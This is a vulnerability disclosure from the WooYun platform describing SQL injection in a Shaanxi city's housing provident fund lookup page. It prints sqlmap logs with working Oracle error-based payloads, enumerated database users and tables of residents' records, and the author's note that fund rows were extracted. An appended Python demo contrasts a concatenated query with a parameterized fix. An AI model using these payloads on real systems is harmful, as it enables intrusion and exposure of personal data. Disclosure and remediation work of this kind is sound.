
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0141205

Title: SQL injection in the housing provident fund system of a city in Shaanxi Province (involving 9 databases and several hundred thousand users' fund contribution records)

Affected vendor: cncert (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-09-17 09:42

Fixed: 2015-11-03 18:36

Published: 2015-11-03 18:36

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-17: Details sent to the vendor; awaiting vendor handling
2015-09-19: Vendor confirmed; details visible to the vendor only
2015-09-29: Details disclosed to core white hats and relevant domain experts
2015-10-09: Details disclosed to regular white hats
2015-10-19: Details disclosed to intern white hats
2015-11-03: Details disclosed to the public

Brief description:

SQL injection exists.

Detailed description:

http://**.**.**.**/chaxun_geren.asp


This is the personal-record lookup; the injection is here.

[01:06:47] [INFO] testing connection to the target URL
[01:06:48] [INFO] testing if the target URL is stable. This can take a couple of seconds
[01:06:50] [INFO] target URL is stable
[01:06:50] [INFO] testing if POST parameter 'RealName' is dynamic
[01:06:50] [WARNING] POST parameter 'RealName' does not appear dynamic
[01:06:50] [INFO] heuristic (basic) test shows that POST parameter 'RealName' might be injectable (possible DBMS: 'Oracle')
[01:06:50] [INFO] testing for SQL injection on POST parameter 'RealName'
[01:06:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:06:55] [WARNING] reflective value(s) found and filtering out
[01:06:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:07:00] [INFO] POST parameter 'RealName' is 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' injectable
[01:07:07] [INFO] testing 'Oracle inline queries'
[01:07:07] [INFO] testing 'Oracle AND time-based blind'
[01:07:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:07:07] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:07:08] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[01:07:10] [INFO] target URL appears to have 1 column in query
POST parameter 'RealName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[01:07:14] [INFO] testing if POST parameter 'UserIDCard' is dynamic
[01:07:14] [WARNING] POST parameter 'UserIDCard' does not appear dynamic
[01:07:15] [INFO] heuristic (basic) test shows that POST parameter 'UserIDCard' might be injectable (possible DBMS: 'Oracle')
[01:07:15] [INFO] testing for SQL injection on POST parameter 'UserIDCard'
[01:07:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:07:22] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:07:25] [INFO] POST parameter 'UserIDCard' is 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' injectable
[01:07:25] [INFO] testing 'Oracle inline queries'
[01:07:25] [INFO] testing 'Oracle AND time-based blind'
[01:07:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
POST parameter 'UserIDCard' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Place: POST
Parameter: RealName
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: RealName=111' AND 7087=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(114)||CHR(115)||CHR(114)||CHR(113)||(SELECT (CASE WHEN (7087=7087) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(101)||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND 'AcMJ'='AcMJ&UserIDCard=222&GetType=0&button= %B2%E9%D1%AF
Place: POST
Parameter: UserIDCard
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: RealName=111&UserIDCard=222' AND 2427=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(114)||CHR(115)||CHR(114)||CHR(113)||(SELECT (CASE WHEN (2427=2427) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(101)||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND 'RJbB'='RJbB&GetType=0&button= %B2%E9%D1%AF
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: RealName, type: Single quoted string (default)
[1] place: POST, parameter: UserIDCard, type: Single quoted string
[q] Quit
> 0
[01:07:46] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5
back-end DBMS: Oracle
[01:07:46] [INFO] fetching current user
[01:07:46] [INFO] retrieved: XYS_DATA
current user: 'XYS_DATA'
[01:07:46] [INFO] fetching current database
[01:07:46] [INFO] resumed: XYS_DATA
[01:07:46] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'XYS_DATA'
[01:07:46] [INFO] testing if current user is DBA
current user is DBA: False
database management system users [42]:
[*] AMBULANCE
[*] ANONYMOUS
[*] APEX_030200
[*] APEX_PUBLIC_USER
[*] APPQOSSYS
[*] BI
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] EXFSYS
[*] FAREN
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OCCIWRAPPER
[*] OE
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDDATA
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] OWBSYS_AUDIT
[*] PM
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TAIJI
[*] WMSYS
[*] XDB
[*] XS$NULL
[*] XYS_DATA
[*] XYS_DATA_IMPORT
available databases [9]:
[*] APEX_030200
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] XDB
[*] XYS_DATA
Database: XYS_DATA
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| TBL_BASE_POPULATION   | 7505097 |
| TBL_SHEET_INFO_14     | 5186324 |
| BAK_SHEET_INFO_13     | 5178531 |
| WJW_EXTEND_CZRKPERSON | 4946198 |
| BAK_BASE_POPULATION   | 3770536 |
| TBL_SHEET_INFO_4      | 3710291 |
| WJW_EXTEND_LDRKPERSON | 398605  |
| TBL_SHEET_INFO_3      | 380000  |
| TBL_SHEET_INFO_8      | 376036  |
| TBL_SHEET_INFO_11     | 371212  |
| GJJ_EXTENDS_PERSON    | 357117  |
| TBL_SHEET_INFO_9      | 312138  |
| YGT_EXTEND_POPULATION | 200185  |
| TBL_BASE_ENTERPRISE   | 73195   |
| TBL_SHEET_INFO_22     | 45827   |
| TBL_SHEET_INFO_6      | 13468   |
| YGT_EXTEND_ENTERPRISE | 5680    |
| TBL_SHEET_INFO_26     | 1015    |
| TBL_SHEET_INFO_25     | 164     |
| TBL_SHEET_INFO_16     | 107     |
| TBL_SHEET_INFO_30     | 61      |
| TBL_SHEET_INFO_15     | 40      |
| TBL_SHEET_INFO_17     | 34      |
| TBL_SHEET_INFO_29     | 4       |
| TBL_SHEET_INFO_18     | 1       |
+-----------------------+---------+


| GJJ_EXTENDS_PERSON    | 357117  |
| WJW_EXTEND_CZRKPERSON | 4946198 |
| WJW_EXTEND_LDRKPERSON | 398605  |


Pulled 10 rows from GJJ_EXTENDS_PERSON as a test: each month's housing fund contribution and the fund total are visible, along with some related information. Not sure whether this counts as sensitive?

(screenshot: 1.jpg)


The DepartmentName and DepartmentNum parameters mentioned in
http://**.**.**.**/bugs/wooyun-2015-0129844
still have not been fixed!

Proof of vulnerability:

As above.

Remediation:

Fix by filtering the input.
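Remediation in code, as an added illustration that is not part of the original report: the ASP page itself is not available, so this Python sketch uses sqlite3 as an offline stand-in for the Oracle backend, with constructed sample rows and an assumed column layout for GJJ_EXTENDS_PERSON. It places the string-concatenation pattern sqlmap exploited next to a hardened lookup that checks RealName and UserIDCard against allow-lists and then binds them as query parameters. The bound parameters do the real work; the allow-list check is defence in depth, and "filtering" on its own would not help if the values were still spliced into the SQL text.

```python
import re
import sqlite3

# Constructed sample rows standing in for a housing-fund person table. sqlite3 is
# used only as an offline stand-in for the Oracle backend named in the report.
SAMPLE_ROWS = [
    ("张三", "110101199001011234", 1200),
    ("李四", "110101198505052345", 980),
    ("王五", "11010119920303345X", 1500),
]

# Assumed allow-lists for the two injected parameters (not taken from the report):
# RealName: CJK characters or Latin letters and spaces, 1-30 chars;
# UserIDCard: PRC resident ID, 17 digits followed by a digit or X.
NAME_RE = re.compile(r"^[\u4e00-\u9fffA-Za-z ]{1,30}$")
ID_CARD_RE = re.compile(r"^\d{17}[\dX]$")


def make_db():
    """Build the in-memory sample database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE GJJ_EXTENDS_PERSON "
        "(RealName TEXT, UserIDCard TEXT, MonthlyPayment INTEGER)"
    )
    conn.executemany("INSERT INTO GJJ_EXTENDS_PERSON VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def build_concatenated_sql(real_name, id_card):
    """The defect class sqlmap found: request fields spliced into the SQL text."""
    return (
        "SELECT RealName, UserIDCard, MonthlyPayment FROM GJJ_EXTENDS_PERSON "
        "WHERE RealName = '" + real_name + "' AND UserIDCard = '" + id_card + "'"
    )


def lookup_vulnerable(conn, real_name, id_card):
    """Runs whatever SQL the caller's input turned the query into."""
    return conn.execute(build_concatenated_sql(real_name, id_card)).fetchall()


def lookup_parameterized(conn, real_name, id_card):
    """Bound parameters: the driver never interprets the values as SQL."""
    sql = (
        "SELECT RealName, UserIDCard, MonthlyPayment FROM GJJ_EXTENDS_PERSON "
        "WHERE RealName = ? AND UserIDCard = ?"
    )
    return conn.execute(sql, (real_name, id_card)).fetchall()


def lookup_fixed(conn, real_name, id_card):
    """Hardened lookup: allow-list validation first, then the parameterized query."""
    if not NAME_RE.match(real_name) or not ID_CARD_RE.match(id_card):
        raise ValueError("RealName or UserIDCard failed validation")
    return lookup_parameterized(conn, real_name, id_card)


def demo():
    """Returns (rows leaked by the concatenated query, fixed path rejected probe,
    rows returned to a legitimate fixed-path lookup)."""
    conn = make_db()
    probe = "x' OR '1'='1"  # constructed tautology probe, not a value from the report
    leaked = lookup_vulnerable(conn, probe, probe)
    try:
        lookup_fixed(conn, probe, probe)
        blocked = False
    except ValueError:
        blocked = True
    legit = lookup_fixed(conn, "张三", "110101199001011234")
    return len(leaked), blocked, len(legit)


if __name__ == "__main__":
    print(demo())  # (3, True, 1)
```

With the concatenated query the probe rewrites the WHERE clause and every row comes back; with bound parameters the same probe is compared as an ordinary string and matches nothing, and the allow-list check rejects it before the query is even issued.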

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-09-19 18:34

Vendor reply:

CNVD has confirmed and reproduced the described vulnerability; it has been passed to CNCERT for dispatch to the Shaanxi sub-center, which will coordinate remediation with the organization that operates the website.

Latest status:

None yet